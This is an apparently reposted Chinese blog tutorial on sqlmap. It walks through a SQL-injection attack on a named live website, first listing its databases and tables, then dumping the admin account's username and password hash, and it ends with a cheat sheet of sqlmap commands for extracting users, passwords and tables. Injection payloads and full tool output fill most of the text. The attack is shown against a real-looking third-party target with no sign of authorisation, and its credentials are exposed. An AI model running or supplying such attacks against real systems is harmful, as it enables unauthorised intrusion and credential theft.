sqlmap mysql案例_sqlmap 使用方法及实例

最新推荐文章于 2023-03-04 14:32:57 发布
最新推荐文章于 2023-03-04 14:32:57 发布
阅读量242 收藏 1
点赞数
文章标签: sqlmap mysql案例
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39684495/article/details/113542588
版权

注:标黄处为输入内容     批注为得到的信息

1.-u url --dbs 爆数据库

[root@Hacker~]# Sqlmap -u http://www.lbgold.com/article_show.php?id=1826 --dbs

sqlmap/1.0-dev - automatic SQL injection and database takeover tool

http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual

consent is illegal. It is the end user's responsibility to obey all applicable

local, state and federal laws. Developers assume no liability and are not respon

sible for any misuse or damage caused by this program

[*] starting at 15:23:20

[15:23:21] [INFO] resuming back-end DBMS 'mysql'

[15:23:21] [INFO] testing connection to the target url

[15:23:22] [INFO] heuristics detected web page charset 'UTF-8'

sqlmap identified the following injection points with a total of 0 HTTP(s) reque

sts:

---

Place: GET

Parameter: id

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: id=1826 AND 8515=8515

Type: UNION query

Title: MySQL UNION query (NULL) - 11 columns

Payload: id=1826 LIMIT 1,1 UNION ALL SELECT NULL, NULL, NULL, CONCAT(0x3a6e7

46d3a,0x74437972455a4d666447,0x3a747a793a), NULL, NULL, NULL, NULL, NULL, NULL,

NULL#

Type: AND/OR time-based blind

Title: MySQL > 5.0.11 AND time-based blind

Payload: id=1826 AND SLEEP(5)

---

[15:23:22] [INFO] the back-end DBMS is MySQL

web server operating system: Windows Vista

web application technology: ASP.NET, PHP 5.4.4, Microsoft IIS 7.0

back-end DBMS: MySQL 5.0.11

[15:23:22] [INFO] fetching database names

[15:23:22] [INFO] the SQL query used returns 5 entries

[15:23:22] [INFO] resumed: "information_schema"

[15:23:22] [INFO] resumed: "gold"

[15:23:22] [INFO] resumed: "mysql"

[15:23:22] [INFO] resumed: "performance_schema"

[15:23:22] [INFO] resumed: "test"

available databases [5]:

[*] gold

[*] information_schema

[*] mysql

[*] performance_schema

[*] test

[15:23:23] [INFO] fetched data logged to text files under 'E:\SQLMAP~2\Bin\outpu

t\www.lbgold.com'

[*] shutting down at 15:23:23

2. -u url --tables -D 数据库//爆表段

[root@Hacker~]# Sqlmap -u http://www.lbgold.com/article_show.php?id=1826 --tables -D gold

sqlmap/1.0-dev - automatic SQL injection and database takeover tool

http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual

consent is illegal. It is the end user's responsibility to obey all applicable

local, state and federal laws. Developers assume no liability and are not respon

sible for any misuse or damage caused by this program

[*] starting at 15:52:54

[15:52:54] [INFO] resuming back-end DBMS 'mysql'

[15:52:55] [INFO] testing connection to the target url

[15:52:56] [INFO] heuristics detected web page charset 'UTF-8'

sqlmap identified the following injection points with a total of 0 HTTP(s) reque

sts:

---

Place: GET

Parameter: id

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: id=1826 AND 8515=8515

Type: UNION query

Title: MySQL UNION query (NULL) - 11 columns

Payload: id=1826 LIMIT 1,1 UNION ALL SELECT NULL, NULL, NULL, CONCAT(0x3a6e7

46d3a,0x74437972455a4d666447,0x3a747a793a), NULL, NULL, NULL, NULL, NULL, NULL,

NULL#

Type: AND/OR time-based blind

Title: MySQL > 5.0.11 AND time-based blind

Payload: id=1826 AND SLEEP(5)

---

[15:52:56] [INFO] the back-end DBMS is MySQL

web server operating system: Windows Vista

web application technology: ASP.NET, PHP 5.4.4, Microsoft IIS 7.0

back-end DBMS: MySQL 5.0.11

[15:52:56] [INFO] fetching tables for database: 'gold'

[15:52:58] [INFO] the SQL query used returns 5 entries

[15:52:59] [INFO] retrieved: "admin"

[15:53:00] [INFO] retrieved: "article"

[15:53:01] [INFO] retrieved: "class"

[15:53:02] [INFO] retrieved: "content"

[15:53:03] [INFO] retrieved: "djjl"

Database: gold

[5 tables]

+---------+

| admin   |

| article |

| class   |

| content |

| djjl    |

+---------+

[15:53:04] [INFO] fetched data logged to text files under 'E:\SQLMAP~2\Bin\outpu

t\www.lbgold.com'

[*] shutting down at 15:53:04

3. -u url --columns -T 表段-D数据库//爆字段

[root@Hacker~]# Sqlmap -u http://www.lbgold.com/article_show.php?id=1826 --columns -T admin -D gold

sqlmap/1.0-dev - automatic SQL injection and database takeover tool

http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual

consent is illegal. It is the end user's responsibility to obey all applicable

local, state and federal laws. Developers assume no liability and are not respon

sible for any misuse or damage caused by this program

[*] starting at 15:58:10

[15:58:10] [INFO] resuming back-end DBMS 'mysql'

[15:58:10] [INFO] testing connection to the target url

[15:58:12] [INFO] heuristics detected web page charset 'UTF-8'

sqlmap identified the following injection points with a total of 0 HTTP(s) reque

sts:

---

Place: GET

Parameter: id

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: id=1826 AND 8515=8515

Type: UNION query

Title: MySQL UNION query (NULL) - 11 columns

Payload: id=1826 LIMIT 1,1 UNION ALL SELECT NULL, NULL, NULL, CONCAT(0x3a6e7

46d3a,0x74437972455a4d666447,0x3a747a793a), NULL, NULL, NULL, NULL, NULL, NULL,

NULL#

Type: AND/OR time-based blind

Title: MySQL > 5.0.11 AND time-based blind

Payload: id=1826 AND SLEEP(5)

---

[15:58:12] [INFO] the back-end DBMS is MySQL

web server operating system: Windows Vista

web application technology: ASP.NET, PHP 5.4.4, Microsoft IIS 7.0

back-end DBMS: MySQL 5.0.11

[15:58:12] [INFO] fetching columns for table 'admin' in database 'gold'

[15:58:13] [INFO] the SQL query used returns 3 entries

[15:58:14] [INFO] retrieved: "id","int(2)"

[15:58:15] [INFO] retrieved: "user","char(12)"

[15:58:16] [INFO] retrieved: "password","char(36)"

Database: gold

Table: admin

[3 columns]

+----------+----------+

| Column   | Type     |

+----------+----------+

| id       | int(2)   |

| password | char(36) |

| user     | char(12) |

+----------+----------+

[15:58:17] [INFO] fetched data logged to text files under 'E:\SQLMAP~2\Bin\outpu

t\www.lbgold.com'

[*] shutting down at 15:58:17

4.-u url --dump -C 字段-T表段-D数据库//猜解

(1) 猜解password字段

[root@Hacker~]# Sqlmap -u http://www.lbgold.com/article_show.php?id=1826 --dump -C password -T admin -D gold

sqlmap/1.0-dev - automatic SQL injection and database takeover tool

http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual

consent is illegal. It is the end user's responsibility to obey all applicable

local, state and federal laws. Developers assume no liability and are not respon

sible for any misuse or damage caused by this program

[*] starting at 16:02:05

[16:02:05] [INFO] resuming back-end DBMS 'mysql'

[16:02:05] [INFO] testing connection to the target url

[16:02:06] [INFO] heuristics detected web page charset 'UTF-8'

sqlmap identified the following injection points with a total of 0 HTTP(s) reque

sts:

---

Place: GET

Parameter: id

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: id=1826 AND 8515=8515

Type: UNION query

Title: MySQL UNION query (NULL) - 11 columns

Payload: id=1826 LIMIT 1,1 UNION ALL SELECT NULL, NULL, NULL, CONCAT(0x3a6e7

46d3a,0x74437972455a4d666447,0x3a747a793a), NULL, NULL, NULL, NULL, NULL, NULL,

NULL#

Type: AND/OR time-based blind

Title: MySQL > 5.0.11 AND time-based blind

Payload: id=1826 AND SLEEP(5)

---

[16:02:06] [INFO] the back-end DBMS is MySQL

web server operating system: Windows Vista

web application technology: ASP.NET, PHP 5.4.4, Microsoft IIS 7.0

back-end DBMS: MySQL 5.0.11

[16:02:06] [INFO] fetching entries of column(s) 'password' for table 'admin' in

database 'gold'

[16:02:08] [INFO] the SQL query used returns 1 entries

[16:02:09] [INFO] retrieved: "ecoDz4IPZGYNs"

[16:02:09] [INFO] analyzing table dump for possible password hashes

Database: gold

Table: admin

[1 entry]

+---------------+

| password      |

+---------------+

| ecoDz4IPZGYNs |

+---------------+

[16:02:09] [INFO] table 'gold.admin' dumped to CSV file 'E:\SQLMAP~2\Bin\output\

www.lbgold.com\dump\gold\admin.csv'

[16:02:09] [INFO] fetched data logged to text files under 'E:\SQLMAP~2\Bin\outpu

t\www.lbgold.com'

[*] shutting down at 16:02:09

(2) 猜解id字段

[root@Hacker~]# Sqlmap -u http://www.lbgold.com/article_show.php?id=1826 --dump -C id -T admin -D gold

sqlmap/1.0-dev - automatic SQL injection and database takeover tool

http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual

consent is illegal. It is the end user's responsibility to obey all applicable

local, state and federal laws. Developers assume no liability and are not respon

sible for any misuse or damage caused by this program

[*] starting at 16:10:22

[16:10:22] [INFO] resuming back-end DBMS 'mysql'

[16:10:22] [INFO] testing connection to the target url

[16:10:23] [INFO] heuristics detected web page charset 'UTF-8'

sqlmap identified the following injection points with a total of 0 HTTP(s) reque

sts:

---

Place: GET

Parameter: id

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: id=1826 AND 8515=8515

Type: UNION query

Title: MySQL UNION query (NULL) - 11 columns

Payload: id=1826 LIMIT 1,1 UNION ALL SELECT NULL, NULL, NULL, CONCAT(0x3a6e7

46d3a,0x74437972455a4d666447,0x3a747a793a), NULL, NULL, NULL, NULL, NULL, NULL,

NULL#

Type: AND/OR time-based blind

Title: MySQL > 5.0.11 AND time-based blind

Payload: id=1826 AND SLEEP(5)

---

[16:10:23] [INFO] the back-end DBMS is MySQL

web server operating system: Windows Vista

web application technology: ASP.NET, PHP 5.4.4, Microsoft IIS 7.0

back-end DBMS: MySQL 5.0.11

[16:10:23] [INFO] fetching entries of column(s) 'id' for table 'admin' in databa

se 'gold'

[16:10:24] [INFO] the SQL query used returns 1 entries

[16:10:25] [INFO] retrieved: "1"

[16:10:25] [INFO] analyzing table dump for possible password hashes

Database: gold

Table: admin

[1 entry]

+----+

| id |

+----+

| 1  |

+----+

[16:10:25] [INFO] table 'gold.admin' dumped to CSV file 'E:\SQLMAP~2\Bin\output\

www.lbgold.com\dump\gold\admin.csv'

[16:10:25] [INFO] fetched data logged to text files under 'E:\SQLMAP~2\Bin\outpu

t\www.lbgold.com'

[*] shutting down at 16:10:25

(3) 猜解user字段

[root@Hacker~]# Sqlmap -u http://www.lbgold.com/article_show.php?id=1826 --dump -C user -T admin -D gold

sqlmap/1.0-dev - automatic SQL injection and database takeover tool

http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual

consent is illegal. It is the end user's responsibility to obey all applicable

local, state and federal laws. Developers assume no liability and are not respon

sible for any misuse or damage caused by this program

[*] starting at 16:10:48

[16:10:48] [INFO] resuming back-end DBMS 'mysql'

[16:10:48] [INFO] testing connection to the target url

[16:10:49] [INFO] heuristics detected web page charset 'UTF-8'

sqlmap identified the following injection points with a total of 0 HTTP(s) reque

sts:

---

Place: GET

Parameter: id

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: id=1826 AND 8515=8515

Type: UNION query

Title: MySQL UNION query (NULL) - 11 columns

Payload: id=1826 LIMIT 1,1 UNION ALL SELECT NULL, NULL, NULL, CONCAT(0x3a6e7

46d3a,0x74437972455a4d666447,0x3a747a793a), NULL, NULL, NULL, NULL, NULL, NULL,

NULL#

Type: AND/OR time-based blind

Title: MySQL > 5.0.11 AND time-based blind

Payload: id=1826 AND SLEEP(5)

---

[16:10:49] [INFO] the back-end DBMS is MySQL

web server operating system: Windows Vista

web application technology: ASP.NET, PHP 5.4.4, Microsoft IIS 7.0

back-end DBMS: MySQL 5.0.11

[16:10:49] [INFO] fetching entries of column(s) 'user' for table 'admin' in data

base 'gold'

[16:10:49] [INFO] the SQL query used returns 1 entries

[16:10:50] [INFO] retrieved: "ssb"

[16:10:51] [INFO] analyzing table dump for possible password hashes

Database: gold

Table: admin

[1 entry]

+------+

| user |

+------+

| ssb  |

+------+

[16:10:51] [INFO] table 'gold.admin' dumped to CSV file 'E:\SQLMAP~2\Bin\output\

www.lbgold.com\dump\gold\admin.csv'

[16:10:51] [INFO] fetched data logged to text files under 'E:\SQLMAP~2\Bin\outpu

t\www.lbgold.com'

[*] shutting down at 16:10:51

[root@Hacker~]# Sqlmap

5.sqlmap工具的使用命令

mssql access 直接爆表.然后你懂的

BT5里面的话前面就要加python

sqlmap.py -u url --dbs //爆数据库

sqlmap.py -u url --current-db //爆当前库

sqlmap.py -u url --current-user //爆当前用户

sqlmap.py -u url --users   查看用户权限

sqlmap.py -u url --tables -D 数据库//爆表段

sqlmap.py -u url --columns -T 表段-D数据库//爆字段

sqlmap.py -u url --dump -C 字段-T表段-D数据库//猜解

sqlmap.py -u url --dump --start=1 --stop=3 -C 字段-T表段-D数据库//猜解1到3的字段

翻回来也可以

sqlmap.py -u url  判断

sqlmap.py -u url --is-dba -v   这是判断当前数据库的使用者是否是dba

sqlmap.py -u url --users -v 0  这句的目的是列举数据库的用户

sqlmap.py -u url --passwords -v 0 这句的目的是获取数据库用户的密码

sqlmap.py -u url --privileges -v 0 这是判断当前的权限

sqlmap.py -u url --dbs -v 0 这句的目的是将所有的数据库列出来

sqlmap.py -u url --tables -D '表'爆表

sqlmap.py -u url --columns -T ‘表’-D‘数据库’爆列

sqlmap.py -u url --dump -T '表' --start 1 --stop 4 -v 0这里是查询第2到第4行的内

sqlmap.py -u url --dump -all -v 0

weixin_39684495
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
sqlmap工具与sql注入漏洞测试
feinifi的博客
05-10 2724
sql注入是我们在开发与面试中经常听到的一个词语,它利用sql语句本身执行的特点,加入一些特定的语句拼接,骗过sql编译,最后执行,结果就出现意想不到的情况。 我在之前的工作中并不了解sqlmap,直到有一次,安全团队给我们发了很多安全漏洞的邮件,这些都是需要修复的,并报告给他们,然后他们复测,没有问题,这些安全问题才能被清理。 在我看的安全漏洞信息描述的截图里面,我看到一个关于sqlmap的执行命令,当时怀着好奇的心理去了解了一下这个东西,发现其实就是用来做sql注入检测的。 ...
安全测试===sqlmap(叁)转载
weixin_34187862的博客
02-13 272
十五、操作系统控制 1.执行任意操作系统命令 参数:--os-cmd和--os-shell 若数据库管理系统是MySQL、PostgreSQL或微软的SQL Server且当前用户有相关权限Sqlmap就能利用SQL注入执行任意的操作系统命令。 当数据库管理系统是MySQL或PostgreSQL时,Sqlmap会通过前面介绍过的文件上传功能上传一个包含用户自定义函数sys_exec()和s...
实战sqlmap绕过WAF
qq_50854662的博客
10-27 985
本文转载于https://xz.aliyun.com/t/10385 实战演示 通过前期的信息收集发现存在注入的页面如下: 直接使用sqlmap跑发现出现如下错误: python2 sqlmap.py -u "http://xxxx?&daxxtae=null&parame=xxxxxx" --batch --delay=1 --random-agent ___ __H__ ___ ___["]_____ ___ ___ {1.5.4.7#dev} |_
sqlmap工具使用手册
u012002125的博客
06-17 2029
sqlmap 是一个开源渗透测试工具,它可以自动检测和利用 SQL 注入漏洞来接管数据库服务器。它具有强大的检测引擎,同时有众多强大功能,包括数据库指纹识别、从数据库中获取数据、访问底层文件系统以及在操作系统上带内连接执行命令。...
sqlmap翻译
qq_43776408的博客
08-31 1824
heuristics detected web page charset 启发式检测到的网页字符集 it is not recommended to continue in this kind of cases. Do you want to quit and make sure that everything is set up properly 在这种情况下, 不建议继续。您是否要退出并确保...
sqlmap 使用方法实例
weixin_30421809的博客
01-12 200
注:标黄处为输入内容 批注为得到的信息 1.-u url --dbs 爆数据库 [root@Hacker~]# Sqlmap -u http://www.lbgold.com/article_show.php?id=1826 --dbs sqlmap/1.0-dev - automatic SQL injection and database takeover tool...
sql漏洞注入(初级)
qq_35489632的博客
05-27 306
sql漏洞注入(初级) 文章目录sql漏洞注入(初级)在浏览器上查看相关参数获取数据库GET注入获取数据库信息查询数据库用户信息爆破字段 在浏览器上查看相关参数 1.cookie 2.提交的url [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-X0NYGTMq-1590577879460)(./1590573311450.png)] 获取数据库 \\只截取关键部分 root@anes:~# sqlmap -u "http://192.168.42.128/dvwa/vu
作业3:使用 sqlmap 获取数据库信息
diligent_lee的博客
07-20 4171
作业三 1. 环境准备 在安装好 Python 的环境下运行以下命令安装 sqlmap: pip install sqlmap 安装 Python3 中用于连接 MySQL 服务器的一个库: pip install pymysql sqlmap 直连数据库测试: sqlmap -d mysql://root:cugjsj123@localhost:3306/login -f --banner 参数解释如下: -d:直连数据库,后面跟着连接信息。mysql://用户名:密码@主机名:
sql注入进阶--跑向mysql
jiangliuzheng的专栏
07-11 7814
1、之前也是google关键字搜索,找到了一个相对有点难度的网站http://www.konzern.com.cn/about/index.php?id=2 2、测试什么的就不用说了,直接sqlmap跑起来。 (1)先看看是什么数据库吧,废话,不是已经剧透了吗。 c:\Python27\sqlmap>sqlmap.py -u http://www.konzern.com.cn/a
180208—【CTF】Windows下 sqlmap 安装、配置、及快捷方式启动
DRondong的博客
02-08 5174
legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user’s responsibility to obey all applicable local, state and federal laws. Developers...
sqlmap自动扫描器.zip_sqlmap_sqlmap扫描器_sql工具
09-23
sqlmap非常好用的数据库渗透工具,请合理使用
sqlmapproject-sqlmap-1.4.7-26-g84bc264 (1)_sqlmap_tool_
09-30
very good sqlmap tool
ibatis-sqlmap_2.3.4_2.jar两个版本的jar包
03-05
ibatis-sqlmap_2.3.4.jar 和 ibatis-sqlmap_2.jar 两个jar包的下载
sqlmap使用方法笔记
04-21
网络安全攻防工具 sqlmap 使用方法笔记,包括攻击实例使用简介,是听课程做的笔记,适合初学者
SQLMAP使用笔记.pdf
01-25
SQLMAP使用笔记
SQLmap 爆破
weixin_43304436的博客
12-24 45
1、Sqlmap -u "http://114.67.246.176:11055/index.php?" --data="id=1" (这里 --data=“id=1” 是自己提交的post数据) 2、输出数据库类型 POST parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? ...
算机网络安全基础知识5:sql注入漏洞攻击,DVWA演示sql注入漏洞,如何利用sql注入查看数据库信息,sqlmap,sql注入漏洞的防御
weixin_46838716的博客
03-04 1621
算机网络安全基础知识5:sql注入漏洞攻击,DVWA演示sql注入漏洞,如何利用sql注入查看数据库信息,sqlmap,sql注入漏洞的防御
info testing mysql_诺亚舟教育网SQL注入漏洞(涉及近170w用户信息)
weixin_39943442的博客
02-03 513
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutualconsent is illegal. It is the end user's responsibility to obey all applicablelocal, state and federal laws. Developers ...
Linux-学习之漏洞探索sqlmap
weixin_34290390的博客
03-05 415
输出信息: [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws....
kali用sqlmap sqlmap.py: command not found
最新发布
08-31
对于您遇到的问题,可能是由于以下几种原因导致的: 1. 您可能没有正确安装sqlmap。请确保您已经正确地安装了sqlmap,并且路径已经正确地添加到系统的环境变量中。可以通过在终端中运行"sqlmap"命令来检查是否已经正确安装。 2. 如果您已经正确安装了sqlmap,但仍然遇到"sqlmap.py: command not found"错误,可能是由于执行权限问题。请确保您对sqlmap.py文件具有执行权限。您可以使用以下命令为该文件添加执行权限: ``` chmod +x /path/to/sqlmap.py ``` 然后尝试再次运行"sqlmap.py"命令。 3. 如果您使用的是Kali Linux,可以尝试使用以下命令安装sqlmap: ``` apt-get update apt-get install sqlmap ``` 这将自动安装并配置sqlmap。 如果上述方法都没有解决问题,请提供更多详细信息,例如您的操作系统版本、sqlmap的安装方法等,以便我可以更好地帮助您解决问题。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值